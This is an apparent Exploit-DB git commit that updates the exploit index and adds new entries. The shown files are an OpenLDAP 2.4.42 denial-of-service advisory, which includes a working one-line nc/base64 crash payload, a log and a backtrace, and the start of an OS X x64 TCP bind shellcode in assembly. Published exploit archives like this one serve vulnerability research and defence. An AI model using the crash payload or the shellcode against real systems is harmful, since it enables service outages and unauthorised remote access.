DB: 2015-09-12

6 new exploits
This commit is contained in:
Offensive Security 2015-09-12 05:02:45 +00:00
parent 42b241205e
commit 1ba31aab30
7 changed files with 563 additions and 20 deletions

View file

@ -33262,7 +33262,7 @@ id,file,description,date,author,platform,type,port
36858,platforms/lin_x86-64/shellcode/36858.c,"Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)",2015-04-29,noviceflux,lin_x86-64,shellcode,0
36859,platforms/windows/local/36859.txt,"Foxit Reader PDF <= 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
36860,platforms/php/webapps/36860.txt,"WordPress TheCartPress Plugin 1.3.9 - Multiple Vulnerabilities",2015-04-29,"High-Tech Bridge SA",php,webapps,80
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,"John Page",windows,webapps,5466
36861,platforms/windows/webapps/36861.txt,"Wing FTP Server Admin 4.4.5 - Multiple Vulnerabilities",2015-04-29,hyp3rlinx,windows,webapps,5466
36862,platforms/php/webapps/36862.txt,"OS Solution OSProperty 2.8.0 - SQL Injection",2015-04-29,"Brandon Perry",php,webapps,80
36863,platforms/php/webapps/36863.txt,"Joomla Machine Component Multiple SQL Injection Vulnerabilities",2012-02-20,the_cyber_nuxbie,php,webapps,0
36864,platforms/hardware/remote/36864.txt,"Xavi 7968 ADSL Router Multiple Function CSRF",2012-02-21,Busindre,hardware,remote,0
@ -33375,7 +33375,7 @@ id,file,description,date,author,platform,type,port
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,hyp3rlinx,php,webapps,0
36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@ -33384,8 +33384,8 @@ id,file,description,date,author,platform,type,port
36989,platforms/php/webapps/36989.txt,"eFront 3.6.15 - Multiple SQL Injection Vulnerabilities",2015-05-11,"Filippo Roncari",php,webapps,0
36990,platforms/php/webapps/36990.txt,"eFront 3.6.15 - Path Traversal Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0
36991,platforms/php/webapps/36991.txt,"eFront 3.6.15 - PHP Object Injection Vulnerability",2015-05-11,"Filippo Roncari",php,webapps,0
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,"John Page",php,webapps,0
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,"John Page",php,webapps,0
36992,platforms/php/webapps/36992.txt,"Wing FTP Server Admin <= 4.4.5 - CSRF Add Arbitrary User",2015-05-11,hyp3rlinx,php,webapps,0
36993,platforms/php/webapps/36993.txt,"SQLBuddy 1.3.3 - Path Traversal Vulnerability",2015-05-11,hyp3rlinx,php,webapps,0
36996,platforms/unix/remote/36996.rb,"SixApart MovableType Storable Perl Code Execution",2015-05-12,metasploit,unix,remote,80
36997,platforms/php/webapps/36997.txt,"CMSimple 3.3 'index.php' Cross Site Scripting Vulnerability",2012-03-21,"Stefan Schurtz",php,webapps,0
36998,platforms/php/webapps/36998.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php Multiple Parameter XSS",2012-03-21,"High-Tech Bridge",php,webapps,0
@ -33461,7 +33461,7 @@ id,file,description,date,author,platform,type,port
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,"John Page",jsp,webapps,80
37152,platforms/jsp/webapps/37152.txt,"JSPMyAdmin 1.1 Multiple Vulnerabilities",2015-05-29,hyp3rlinx,jsp,webapps,80
37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
@ -33658,9 +33658,9 @@ id,file,description,date,author,platform,type,port
37267,platforms/windows/dos/37267.py,"foobar2000 1.3.8 (.m3u) Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37268,platforms/windows/dos/37268.py,"GoldWave 6.1.2 Local Crash PoC",2015-06-12,0neb1n,windows,dos,0
37292,platforms/linux/local/37292.c,"Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayfs Local Root (Shell)",2015-06-16,rebel,linux,local,0
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,"John Page",php,webapps,80
37270,platforms/php/webapps/37270.txt,"Nakid CMS - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,php,webapps,80
37271,platforms/multiple/webapps/37271.txt,"Opsview <= 4.6.2 - Multiple XSS Vulnerabilities",2015-06-12,"Dolev Farhi",multiple,webapps,80
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,"John Page",jsp,webapps,8080
37272,platforms/jsp/webapps/37272.txt,"ZCMS 1.1 - Multiple Vulnerabilities",2015-06-12,hyp3rlinx,jsp,webapps,8080
37274,platforms/php/webapps/37274.txt,"WordPress SE HTML5 Album Audio Player 1.1.0 - Directory Traversal",2015-06-12,"Larry W. Cashdollar",php,webapps,80
37275,platforms/php/webapps/37275.txt,"WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload",2015-06-12,"Larry W. Cashdollar",php,webapps,80
37277,platforms/php/webapps/37277.txt,"concrete5 index.php/tools/required/files/search_dialog ocID Parameter XSS",2012-05-20,AkaStep,php,webapps,0
@ -33713,7 +33713,7 @@ id,file,description,date,author,platform,type,port
37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
37440,platforms/php/webapps/37440.txt,"Watchguard XCS <= 10.0 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,php,webapps,0
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,hyp3rlinx,php,webapps,80
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
@ -33796,7 +33796,7 @@ id,file,description,date,author,platform,type,port
37564,platforms/hardware/remote/37564.txt,"Barracuda Email Security Service Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",hardware,remote,0
37437,platforms/php/webapps/37437.txt,"Coppermine Photo Gallery 'index.php' Script SQL Injection Vulnerability",2012-06-20,"Taurus Omar",php,webapps,0
37438,platforms/php/webapps/37438.txt,"Adiscan LogAnalyzer 3.4.3 Cross Site Scripting Vulnerability",2012-06-21,"Sooraj K.S",php,webapps,0
37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,"John Page",php,webapps,80
37439,platforms/php/webapps/37439.txt,"Novius 5.0.1 - Multiple Vulnerabilities",2015-06-30,hyp3rlinx,php,webapps,80
37441,platforms/jsp/webapps/37441.txt,"WedgeOS <= 4.0.4 - Multiple Vulnerabilities",2015-06-30,Security-Assessment.com,jsp,webapps,0
37442,platforms/linux/webapps/37442.txt,"CollabNet Subversion Edge Management 4.0.11 - Local File Inclusion",2015-06-30,otr,linux,webapps,4434
37443,platforms/php/webapps/37443.txt,"Joomla! 'com_szallasok' Component 'id' Parameter SQL Injection Vulnerability",2012-06-21,CoBRa_21,php,webapps,0
@ -33867,7 +33867,7 @@ id,file,description,date,author,platform,type,port
37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN launchAgent.do return-To Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN fileSystem.do Multiple Parameter XSS",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
37514,platforms/php/webapps/37514.txt,"WordPress ACF Frontend Display Plugin 2.0.5 - File Upload Vulnerability",2015-07-07,"TUNISIAN CYBER",php,webapps,80
37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,"John Page",php,webapps,80
37515,platforms/php/webapps/37515.txt,"phpliteadmin 1.1 - Multiple Vulnerabilities",2015-07-07,hyp3rlinx,php,webapps,80
37516,platforms/hardware/webapps/37516.txt,"Dlink DSL-2750u and DSL-2730u - Authenticated Local File Disclosure",2015-07-07,"SATHISH ARTHAR",hardware,webapps,0
37517,platforms/hardware/dos/37517.pl,"INFOMARK IMW-C920W miniupnpd 1.0 - Denial of Service",2015-07-07,"Todor Donev",hardware,dos,1900
37518,platforms/multiple/dos/37518.html,"Arora Browser Remote Denial of Service Vulnerability",2012-07-18,t3rm!n4t0r,multiple,dos,0
@ -33877,7 +33877,7 @@ id,file,description,date,author,platform,type,port
37522,platforms/php/webapps/37522.txt,"WordPress chenpress Plugin Arbitrary File Upload Vulnerability",2012-07-21,Am!r,php,webapps,0
37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player ByteArray Use After Free",2015-07-08,metasploit,multiple,remote,0
37524,platforms/hardware/webapps/37524.txt,"Cradlepoint MBR1400 and MBR1200 Local File Inclusion",2015-07-08,Doc_Hak,hardware,webapps,80
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,"John Page",windows,dos,0
37525,platforms/windows/dos/37525.c,"Symantec Endpoint Protection 12.1.4013 Service Disabling Vulnerability",2015-07-08,hyp3rlinx,windows,dos,0
37526,platforms/windows/dos/37526.txt,"Immunity Debugger 1.85 - Crash PoC",2015-07-08,Arsyntex,windows,dos,0
37527,platforms/hardware/webapps/37527.txt,"AirLink101 SkyIPCam1620W OS Command Injection",2015-07-08,"Core Security",hardware,webapps,0
37528,platforms/php/webapps/37528.txt,"Centreon 2.5.4 - Multiple Vulnerabilities",2015-07-08,"Huy-Ngoc DAU",php,webapps,80
@ -33930,7 +33930,7 @@ id,file,description,date,author,platform,type,port
37585,platforms/php/webapps/37585.txt,"TCExam 11.2.x /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection",2012-08-07,"Chris Cooper",php,webapps,0
37586,platforms/php/webapps/37586.php,"PBBoard Authentication Bypass Vulnerability",2012-08-07,i-Hmx,php,webapps,0
37587,platforms/php/webapps/37587.txt,"GetSimple 'path' Parameter Local File Include Vulnerability",2012-08-07,PuN!Sh3r,php,webapps,0
37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,"John Page",php,webapps,80
37588,platforms/php/webapps/37588.txt,"phpSQLiteCMS - Multiple Vulnerabilities",2015-07-13,hyp3rlinx,php,webapps,80
37589,platforms/java/webapps/37589.txt,"ConcourseSuite Multiple Cross Site Scripting and Cross Site Request Forgery Vulnerabilities",2012-08-08,"Matthew Joyce",java,webapps,0
37590,platforms/php/webapps/37590.txt,"PHPList 2.10.18 'unconfirmed' Parameter Cross-Site Scripting Vulnerability",2012-08-08,"High-Tech Bridge SA",php,webapps,0
37591,platforms/php/webapps/37591.php,"AraDown 'id' Parameter SQL Injection Vulnerability",2012-08-08,G-B,php,webapps,0
@ -34020,7 +34020,7 @@ id,file,description,date,author,platform,type,port
37683,platforms/php/webapps/37683.txt,"Phorum 5.2.18 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
37684,platforms/php/webapps/37684.html,"PrestaShop <= 1.4.7 Multiple Cross Site Scripting Vulnerabilities",2012-08-29,"High-Tech Bridge",php,webapps,0
37685,platforms/xml/dos/37685.txt,"squidGuard 1.4 - Long URL Handling Remote Denial of Service Vulnerability",2012-08-30,"Stefan Bauer",xml,dos,0
37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,"John Page",multiple,webapps,0
37686,platforms/multiple/webapps/37686.txt,"Hawkeye-G v3.0.1.4912 CSRF Vulnerability",2015-07-24,hyp3rlinx,multiple,webapps,0
37687,platforms/php/webapps/37687.txt,"TomatoCart 'example_form.ajax.php' Cross Site Scripting Vulnerability",2012-08-30,HauntIT,php,webapps,0
37689,platforms/asp/webapps/37689.txt,"XM Forum 'search.asp' SQL Injection Vulnerability",2012-08-30,Crim3R,asp,webapps,0
37690,platforms/php/webapps/37690.txt,"Crowbar 'file' Parameter Multiple Cross Site Scripting Vulnerabilities",2012-08-30,"Matthias Weckbecker",php,webapps,0
@ -34033,7 +34033,7 @@ id,file,description,date,author,platform,type,port
37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0
37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting Vulnerability",2012-09-05,"High-Tech Bridge",php,webapps,0
37699,platforms/windows/local/37699.py,"Foxit Reader - PNG Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",windows,local,0
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,"John Page",multiple,webapps,0
37700,platforms/multiple/webapps/37700.txt,"Hawkeye-G v3.0.1.4912 Persistent XSS & Information Leakage",2015-07-27,hyp3rlinx,multiple,webapps,0
37706,platforms/linux/dos/37706.txt,"Libuser Library - Multiple Vulnerabilities",2015-07-27,"Qualys Corporation",linux,dos,0
37737,platforms/windows/local/37737.rb,"Heroes of Might and Magic III .h3m Map file Buffer Overflow",2015-08-07,metasploit,windows,local,0
37825,platforms/osx/local/37825.txt,"OS X 10.10.5 - XNU Local Privilege Escalation",2015-08-18,kpwn,osx,local,0
@ -34043,10 +34043,10 @@ id,file,description,date,author,platform,type,port
37705,platforms/php/webapps/37705.txt,"WordPress Unite Gallery Lite Plugin 1.4.6 - Multiple Vulnerabilities",2015-07-27,"Nitin Venkatesh",php,webapps,80
37707,platforms/php/webapps/37707.txt,"WordPress Count Per Day Plugin 3.4 - SQL Injection",2015-07-27,"High-Tech Bridge SA",php,webapps,80
37708,platforms/php/webapps/37708.txt,"Xceedium Xsuite - Multiple Vulnerabilities",2015-07-27,modzero,php,webapps,0
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,"John Page",php,webapps,0
37709,platforms/php/webapps/37709.txt,"phpFileManager 0.9.8 - Remote Command Execution Vulnerability",2015-07-28,hyp3rlinx,php,webapps,0
37710,platforms/linux/local/37710.txt,"Sudo <= 1.8.14 - Unauthorized Privilege",2015-07-28,"daniel svartman",linux,local,0
37711,platforms/windows/dos/37711.py,"Classic FTP 2.36 - CWD Reconnection DoS",2015-07-28,St0rn,windows,dos,0
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,"John Page",php,webapps,80
37712,platforms/php/webapps/37712.txt,"phpFileManager 0.9.8 - CSRF Vulnerability",2015-07-29,hyp3rlinx,php,webapps,80
37713,platforms/php/webapps/37713.txt,"2Moons - Multiple Vulnerabilities",2015-07-29,bRpsd,php,webapps,80
37714,platforms/php/webapps/37714.txt,"JoomShopping - Blind SQL Injection",2015-07-29,Mormoroth,php,webapps,80
37715,platforms/php/webapps/37715.txt,"Tendoo CMS 1.3 - XSS Vulnerabilities",2015-07-29,"Arash Khazaei",php,webapps,80
@ -34153,9 +34153,9 @@ id,file,description,date,author,platform,type,port
37812,platforms/win32/remote/37812.rb,"Symantec Endpoint Protection Manager Authentication Bypass and Code Execution",2015-08-18,metasploit,win32,remote,8443
37813,platforms/windows/local/37813.rb,"VideoCharge Studio Buffer Overflow (SEH)",2015-08-18,metasploit,windows,local,0
37814,platforms/python/remote/37814.rb,"Werkzeug Debug Shell Command Execution",2015-08-18,metasploit,python,remote,0
37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,"John Page",php,webapps,80
37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF Vulnerability",2015-08-18,"John Page",php,webapps,80
37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,"John Page",php,webapps,80
37817,platforms/php/webapps/37817.txt,"PHPfileNavigator 2.3.3 - XSS Vulnerabilities",2015-08-18,hyp3rlinx,php,webapps,80
37818,platforms/php/webapps/37818.txt,"PHPfileNavigator 2.3.3 - CSRF Vulnerability",2015-08-18,hyp3rlinx,php,webapps,80
37819,platforms/php/webapps/37819.txt,"PHPfileNavigator 2.3.3 - Privilege Escalation",2015-08-18,hyp3rlinx,php,webapps,80
37820,platforms/php/webapps/37820.txt,"CodoForum 3.3.1 - Multiple SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
37821,platforms/php/webapps/37821.txt,"BigTree CMS 4.2.3 - Authenticated SQL Injection Vulnerabilities",2015-08-18,"Curesec Research Team",php,webapps,80
37822,platforms/php/webapps/37822.txt,"WordPress WP Symposium Plugin 15.1 - Blind SQL Injection",2015-08-18,dxw,php,webapps,80
@ -34382,6 +34382,7 @@ id,file,description,date,author,platform,type,port
38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection Vulnerability",2012-11-26,Amirh03in,php,webapps,0
38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection Vulnerability",2012-11-27,Amirh03in,php,webapps,0
38065,platforms/osx/shellcode/38065.txt,"OS X x64 /bin/sh Shellcode_ NULL Byte Free_ 34 bytes",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack Vulnerability",2015-09-02,"Pier-Luc Maltais",php,webapps,80
38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal Vulnerability",2015-09-02,HaHwul,php,webapps,80
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
@ -34410,7 +34411,7 @@ id,file,description,date,author,platform,type,port
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy Password Change Command Injection",2015-09-07,metasploit,linux,remote,10443
38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80
38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,"John Page",jsp,webapps,8081
38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081
38105,platforms/php/webapps/38105.txt,"Wordpress White-Label Framework 2.0.6 - XSS Vulnerability",2015-09-08,Outlasted,php,webapps,80
38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0_ 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0
38109,platforms/linux/remote/38109.pl,"Oracle MySQL and MariaDB Insecure Salt Generation Security Bypass Weakness",2012-12-06,kingcope,linux,remote,0
@ -34429,6 +34430,7 @@ id,file,description,date,author,platform,type,port
38123,platforms/php/dos/38123.txt,"PHP Session Deserializer Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0
38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
38125,platforms/php/dos/38125.txt,"PHP unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0
38126,platforms/osx/shellcode/38126.c,"OS X x64 - tcp bind shellcode_ NULL byte free (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0
38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0
38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000
38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0
@ -34445,3 +34447,7 @@ id,file,description,date,author,platform,type,port
38142,platforms/php/webapps/38142.txt,"Hero Framework users/login username Parameter XSS",2012-12-24,"Stefan Schurtz",php,webapps,0
38143,platforms/php/webapps/38143.txt,"cPanel 'account' Parameter Cross Site Scripting Vulnerability",2012-12-24,"Rafay Baloch",php,webapps,0
38144,platforms/php/webapps/38144.txt,"City Reviewer 'search.php' Script SQL Injection Vulnerability",2012-12-22,3spi0n,php,webapps,0
38145,platforms/linux/dos/38145.txt,"OpenLDAP 2.4.42 - ber_get_next Denial of Service",2015-09-11,"Denis Andzakovic",linux,dos,389
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0

Can't render this file because it is too large.

129
platforms/linux/dos/38145.txt Executable file
View file

@ -0,0 +1,129 @@
# Exploit Title: OpenLDAP 2.4.42 ber_get_next DOS
# Date: 11/09/15
# Exploit Author: Denis Andzakovic - Security-Assessment.com
# Vendor Homepage: http://www.openldap.org/
# Software Link:
ftp://ftp.openldap.org/pub/OpenLDAP/openldap-release/openldap-2.4.42.tgz
# Version: <= 2.4.42
# Tested on: Debian 8
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
OpenLDAP get_ber_next Denial of Service
Affected Versions: OpenLDAP <= 2.4.42
PDF: http://www.security-assessment.com/files/documents/advisory/OpenLDAP-ber_get_next-Denial-of-Service.pdf
+-------------+
| Description |
+-------------+
By sending a crafted packet, an attacker may cause the OpenLDAP server to reach an assert() statement, crashing
the daemon. This was tested on OpenLDAP 2.4.42 (built with GCC 4.9.2) and OpenLDAP 2.4.40 installed from the Debian
package repository.
+--------------+
| Exploitation |
+--------------+
By sending a crafted packet, an attacker can cause the OpenLDAP daemon to crash with a SIGABRT. This is due to an
assert() call within the ber_get_next method (io.c line 682) that is hit when decoding tampered BER data.
The following proof of concept exploit can be used to trigger the condition:
--[ Exploit POC
echo "/4SEhISEd4MKYj5ZMgAAAC8=" | base64 -d | nc -v 127.0.0.1 389
The above causes slapd to abort as follows when running with '-d3', however it should be noted that this will crash
the server even when running in daemon mode.
--[ sladp -d3
55f0b36e slap_listener_activate(7):
55f0b36e >>> slap_listener(ldap:///)
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=8, got=8
0000: ff 84 84 84 84 84 77 83 ......w.
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
ldap_read: want=1, got=1
0000: 0a .
55f0b36e connection_get(15): got connid=1000
55f0b36e connection_read(15): checking for input on id=1000
ber_get_next
slapd: io.c:682: ber_get_next: Assertion `0' failed.
The following GDB back trace provides further information as to the location of the issue.
--[ back trace
program received signal SIGABRT, Aborted.
[Switching to Thread 0x7ffff2e4a700 (LWP 1371)]
0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0 0x00007ffff6a13107 in __GI_raise (sig=sig@entry=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1 0x00007ffff6a144e8 in __GI_abort () at abort.c:89
#2 0x00007ffff6a0c226 in __assert_fail_base (fmt=0x7ffff6b42ce8 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c",
line=line@entry=682, function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:92
#3 0x00007ffff6a0c2d2 in __GI___assert_fail (assertion=assertion@entry=0x55f280 "0", file=file@entry=0x59bdb1 "io.c", line=line@entry=682,
function=function@entry=0x59bf33 <__PRETTY_FUNCTION__.6337> "ber_get_next") at assert.c:101
#4 0x000000000053261a in ber_get_next (sb=0x7fffe40008c0, len=0x7ffff2e49b40, ber=0x7fffe4000a00) at io.c:682
#5 0x0000000000420b56 in connection_input (cri=<optimized out>, conn=<optimized out>) at connection.c:1572
#6 connection_read (cri=<optimized out>, s=<optimized out>) at connection.c:1460
#7 connection_read_thread (ctx=0x7ffff2e49b90, argv=0xf) at connection.c:1284
#8 0x000000000050c871 in ldap_int_thread_pool_wrapper (xpool=0x8956c0) at tpool.c:696
#9 0x00007ffff6d8f0a4 in start_thread (arg=0x7ffff2e4a700) at pthread_create.c:309
#10 0x00007ffff6ac404d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:111
+----------+
| Solution |
+----------+
This issue has been resolved by commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629 in
git://git.openldap.org/openldap.git
+----------+
| Timeline |
+----------+
10/09/15 - Issue raised on OpenLDAP issue tracker, marked as a minor security issue, as per the requirements in
the ITS, making the issue public.
10/09/15 - Patch pushed to OpenLDAP master branch by Howard Chu, commit 6fe51a9ab04fd28bbc171da3cf12f1c1040d6629
10/09/15 - Release of this advisory document.
+-------------------------------+
| About Security-Assessment.com |
+-------------------------------+
Security-Assessment.com is Australasia's leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients include
some of the largest globally recognised companies in areas such as finance,
telecommunications, broadcasting, legal and government. Our aim is to provide
the very best independent advice and a high level of technical expertise while
creating long and lasting professional relationships with our clients.
Security-Assessment.com is committed to security research and development,
and its team continues to identify and responsibly publish vulnerabilities
in public and private software vendor's products. Members of the
Security-Assessment.com R&D team are globally recognised through their release
of whitepapers and presentations related to new security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment com
Phone +64 4 470 1650

122
platforms/osx/shellcode/38126.c Executable file
View file

@ -0,0 +1,122 @@
;OS X x64, TCP bind shellcode (port 4444), NULL byte free, 144 bytes long
;ASM code
;compile:
;nasm -f macho64 bind-shellcode.asm
;ld -macosx_version_min 10.7.0 -o bindsc bind-shellcode.o
BITS 64
global start
section .text
;Argument order: rdi, rsi, rdx, rcx
start:
;socket
xor rdi,rdi ;zero out RSI
mov dil, 0x2 ;AF_INET = 2
